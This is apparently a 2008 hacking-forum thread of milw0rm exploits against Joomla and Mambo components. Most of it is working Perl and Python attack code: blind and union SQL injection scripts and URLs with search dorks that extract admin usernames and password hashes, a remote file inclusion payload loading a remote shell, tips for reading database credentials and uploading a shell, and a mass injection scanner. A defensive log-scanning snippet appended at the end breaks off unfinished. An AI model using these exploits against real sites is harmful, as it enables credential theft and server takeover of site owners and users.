"option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
# read the response line by line (the original loop read every second line only)
while($s = <$socket>)
{
if($s=~/:::(.+):::/){
$lhs = $1;
($l,$h,$s)=split(':',$lhs);
print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
close $socket;
exit; }
}
die ("Exploit failed!");
:) POST only
otmorozok428
05.06.2008, 16:12
Joomla Component simpleshop <= 3.4 SQL injection
/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/
Author : His0k4 [ALGERIAN HaCkEr]
Dork : inurl:com_simpleshop
Dork : inurl:com_simpleshop "catid"
POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
------------------------------------------------------------------------
Greetings : Str0ke, all friends & muslims HaCkeRs...
milw0rm.com [2008-06-05]
baltazar
08.06.2008, 15:22
http://beenuarora.com/code/joomsq.py
otmorozok428
08.06.2008, 18:33
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
/---------------------------------------------------------------\
\ /
/ Joomla Component GameQ Remote SQL injection \
\ /
\---------------------------------------------------------------/
Author : His0k4 [ALGERIAN HaCkEr]
POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--
•†•SyTiNeR•†•
09.06.2008, 14:15
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component yvcomment Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Contact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:yvcomment o\n";
print " o Usage: perl yvcomment.pl host path <options> o\n";
print " o Example: perl yvcomment.pl www.host.com /joomla/ -a 2 o\n";
print " o o\n";
print " o Options: o\n";
print " o -a valid Article id o\n";
print " o Note: o\n";
print " o You can Change the match string by any content of the correct query o\n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_yvcomment&view=comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "DateAndAuthor";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-08]
Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
#!/usr/bin/perl
#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
#[[Coded by : MEFISTO
#[[Author : ilker Kandemir
#[[Dork : "index.php?option=com_news_portal" or "Powered by iJoomla News Portal"
use IO::Socket;
if(@ARGV < 1){
print "
[[========================================================================
[[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
[[// Usage: cnp.pl [target]
[[// Example: cnp.pl victim.com
[[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO
[[// website : www.dumenci.net -
[[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/^http:\/\///;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_news_portal&Itemid=";
print "Script <DIR> : ";
$dir = <STDIN>;
chomp ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
# char(117,...,58) = "username:" and char(112,...,58) = "password:", spelled out to avoid quotes in the URL
$target = "-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)border/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2008-06-09]
.Begemot.
13.06.2008, 21:45
Mambo Component galleries v 1.0 Remote SQL Injection
#!/usr/bin/perl -w
# Mambo Component galleries v 1.0 Remote SQL Injection #
########################################
# Found by : Houssamix From H-T Team
# H-T Team [ HouSSaMix + ToXiC350 ]
# Greetz : bugtr4cker & Stack & HaCkeR_EgY & Hak3r-b0y & All friends & All muslims HaCkeRs :)
# Script_Name: "Mambo"
# Component_Name: galleries v 1.0
########################################
# <mosinstall type="component">
# <name>galleries</name>
#<creationDate>10/04/2006</creationDate>
#<author>Vinay Kr. Singh</author>
#<copyright>This component is released under the GNU License</copyright>
#<authorEmail>vinay.singh@yahoo.com</authorEmail>
#<authorUrl>www.opensource.com</authorUrl>
#<version>1.0</version>
system("color f");
print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component galleries 1.0 Remote SQL Injection #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t########################################################\n\n";
use LWP::UserAgent;
print "\nEnter your Target (http://site.com/mambo/): ";
chomp(my $target=<STDIN>);
$uname="username";
$passwd="password";
$magic="mos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
# codec by Houssamix From H-T Team
# milw0rm.com [2008-06-13]
.Begemot.
14.06.2008, 12:42
Mambo <= 4.6.4 Remote File Inclusion Vulnerability
.-----------------------------------------------------------------------------.
| vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability |
| download: http://mambo-foundation.org/ |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: all friends ;) |
'-----------------------------------------------------------------------------'
# code:
/includes/Cache/Lite/Output.php :
1 <?php
2
3 /**
4 * This class extends Cache_Lite and uses output buffering to get the data to cache.
5 *
6 * There are some examples in the 'docs/examples' file
7 * Technical choices are described in the 'docs/technical' file
8 *
9 * @package Cache_Lite
10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11 * @author Fabien MARTY <fab@php.net>
12 */
13
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...
^ no comment.. RFI in line 14..
# exploit:
http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
# milw0rm.com [2008-06-13]
Joomla component AstatsPro:
/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(username,password,0x2e,usertype)+from+jos_users+limit+2,1--
You can get into phpMyAdmin by learning the password with the help of JoomlaXplorer (if it is installed): after obtaining the password, go into the JoomlaXplorer component, then find configuration.php and read the DB login and password from it.
You can also upload a shell with this component.
Joomla Component expshop Remote SQL injection
Vulnerability:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}
Example:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
# milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893
Joomla Component com_facileforms 1.4.4
The vulnerability allows a remote user to execute arbitrary PHP code on the target system. It exists due to insufficient validation of input in the "ff_compath" parameter of the facileforms.frame.php script. A remote user can execute arbitrary PHP code on the target system with the privileges of the web server.
Exploit:
www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
Ded MustD!e
25.06.2008, 14:10
Mambo Component Articles Blind SQL Injection 0-day Exploit by Ded MustD!e
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################## #####################\n";
print " # Mambo Component Articles Blind SQL Injection Exploit #\n";
print " # Author:Ded MustD!e [www.antichat.ru] #\n";
print " # #\n";
print " # Dork : inurl:option=articles artid #\n";
print " # Usage: perl exploit.pl host path <options> #\n";
print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -a valid Article id #\n";
print " #######################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
Joomla Component netinvoice Remote SQL injection
POC : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}
Example: http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users--
(c)milw0rm.com
Author : His0k4 [ALGERIAN HaCkEr]
Dork : inurl:com_beamospetition
POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}
Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
------------------------------------------------------------------------
# milw0rm.com [2008-06-28]
Mambo Component n-gallery SQL Injection
DORK : allinurl:"com_n-gallery"
index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*
milw0rm.com [2008-06-30]
and another one:
Joomla Component Xe webtv Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # http://www.palcastle.org/cc #\n";
print " # #\n";
print " # Dork: inurl:com_xewebtv #\n";
print " # Usage: perl xewebtv.pl host path <options> #\n";
print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid tv id #\n";
print " # -c Category value of the following id #\n";
print " # Note: #\n";
print " # You can change the match string if you need that #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $tid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "p=s", "t=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"t"})
{
$tid = $options{"t"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $tid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-28]
baltazar
02.07.2008, 00:22
MamScan v1.0
Mambo Component SQL scanner
#!/usr/bin/python
#Mambo Component SQL scanner, checks source for md5's
#Uncomment line 44 for verbose mode. If md5 found
#check manually.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, time
print "\n\t d3hydr8[at]gmail[dot]com MamScan v1.0"
print "\t------------------------------------------"
sqls = ["index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*",
        "index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*",
        "index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
        "index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--",
        "index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*",
        "index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*",
        "index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*",
        "index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN",
        "index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
        "index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
        "index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
        "index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*",
        "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
        "index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*",
        "index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*",
        "index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
        "index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
        "index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
        "index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
        "index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
        "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",
        "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
        "index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
        "index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+mos_users+limit+0,20--",
        "index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+jos_users+limit+0,20--",
        "administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
        "index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*",
        "index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
        "index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",
        "index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*",
        "index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*",
        "index.php?option=com_musica&Itemid=172&tasko=viewo&task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+from%2F%2A%2A%2Fmos_users/*",
        "index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
        "index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--",
        "index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*",
        "index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*",
        "index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*",
        "index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
        "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
        "index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*",
        "index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--"]
if len(sys.argv) != 2:
    print "\nUsage: ./mamscan.py <site>"
    print "Ex: ./mamscan.py www.test.com\n"
    sys.exit(1)
host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
    host = host+"/"
if host[:7] != "http://":
    host = "http://"+host
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] Starting Scan...\n"
for sql in sqls:
    time.sleep(3) #Change this if needed
    #print "[+] Trying:",host+sql.replace("\n","")
    try:
        source = urllib2.urlopen(host+sql.replace("\n","")).read()
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >= 1:
            print "[!]",host+sql.replace("\n","")
            for md5 in md5s:
                print "\n[+]MD5:",md5
    except(urllib2.HTTPError):
        pass
print "\n[-] Done\n"
Joomla Component altas v 1.0 Multiple Remote SQL Injection
#!/usr/bin/perl -w
# Dork : index.php?option=com_altas
system("color f");
print "\t\t========================================================\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t========================================================\n\n";
use LWP::UserAgent;
print "\nEnter your Target (http://site.com/joomla/): ";
chomp(my $target=<STDIN>);
$uname="username";
$magic="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
# coded by Houssamix From H-T Team
# milw0rm.com [2008-07-04]
Component Agora Forum 1.0.4 Acropolis rus
vuln code:
/moderate.php
$result = $db->query('SELECT id FROM '.$db->prefix.'posts WHERE topic_id='.$_GET['ptid'].' ORDER BY posted LIMIT 1');
vuln code:
/my_uploads.php
$db->query('UPDATE '.$db->prefix.'users SET upload=\''.$upload.'\' WHERE id='.$_GET['id']) or error(sprintf($lang_uploadile['err_insert'],$conf_name), __FILE__, __LINE__, $db->error());
Download:
http://freedom-ru.net/component/option,com_docman/task,doc_download/gid,41/Itemid,105/
;)
ZAMUT (c)
Joomla Component DT Register Remote SQL injection
Author: His0k4 [ALGERIAN HaCkeR]
Dork: inurl:com_DTRegister eventId
Vendor:http://www.dthdevelopment.com/components/dt-register.html
POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
Example: http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
Greetings : All friends & muslims HaCkeRs
www.dz-secure.com
----------------------------------------------------------------------------
# milw0rm.com [2008-07-16]
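The request URLs quoted throughout this thread share a handful of shapes: UNION SELECT against jos_users/mos_users with /**/ or + standing in for spaces (often URL-encoded), blind probes built on SUBSTRING/ASCII, mosConfig_* pointed at a remote URL, and ../ or %00 in a path parameter. As an added example written for this page (not part of any exploit or advisory above), the Python below scans constructed Apache-style access-log lines for those shapes; the log lines, addresses and rule names are made up here.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined-style). They reproduce the
# request shapes quoted in this thread, not traffic from any real site.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Jun/2008:10:01:02 +0000] "GET /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password/**/from/**/jos_users/* HTTP/1.1" 200 5120',
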